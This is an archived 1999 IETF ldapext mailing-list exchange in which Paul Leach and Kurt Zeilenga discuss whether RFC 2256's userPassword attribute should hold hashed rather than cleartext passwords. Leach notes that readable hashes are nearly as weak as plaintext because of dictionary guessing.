[Date Prev][Date Next] [Chronological] [Thread] [Top]

RE: RFC2256: userPassword

To: "'Kurt D. Zeilenga'" <Kurt@OpenLDAP.Org>, ietf-ldapext@netscape.com
Subject: RE: RFC2256: userPassword
From: Paul Leach <paulle@microsoft.com>
Date: Tue, 29 Jun 1999 10:38:10 -0700
Resent-date: Tue, 29 Jun 1999 10:46:30 -0700 (PDT)
Resent-from: ietf-ldapext@netscape.com
Resent-message-id: <"aafDG.A.o-D.qZQe3"@glacier>
Resent-sender: ietf-ldapext-request@netscape.com

Having world readable hashed passwords is almost as bad as having plaintext
ones. In many authentication protocols, the hashed password is plaintext
equivalent (i.e., lets you authenticated as the user whose password hash you
have). In many other cases, checking the hash of 100,000 easy-to-remember
variants of a few million "dictionary" words to see if they match a
particular hashed password can be done in a few days by one computer. (1
million checks per second is not infeasible.)

-----Original Message-----
From: Kurt D. Zeilenga [mailto:Kurt@OpenLDAP.Org]
Sent: Tuesday, June 29, 1999 8:32 AM
To: ietf-ldapext@netscape.com
Subject: RFC2256: userPassword


RFC2256 5.36 userPassword says "Passwords are stored using an
Octet String syntax and are not encrypted."  However, it's
common practice to store "encrypted" passwords in userPassword
using a mechanism derived from RFC2307 (ie: userPassword: {method}hash).

For security considerations, I believe it unwise to ever maintain
a cleartext userPassword.  I believe RFC2256 should be updated to
read:

  Passwords are stored using an Octet String syntax and SHOULD be
  encrypted.  ...

It would also be wise to standardize the syntax for encrypted
userPassword representation (ie: replace Octet String with an
appropriate syntax).

Kurt

Follow-Ups:
- RE: RFC2256: userPassword
  - From: Gomez <gomez@lhola.engr.sgi.com>
- RE: RFC2256: userPassword
  - From: "Kurt D. Zeilenga" <Kurt@OpenLDAP.Org>

Prev by Date: RFC2256: userPassword
Next by Date: RE: RFC2256: userPassword
Index(es):
- Chronological
- Thread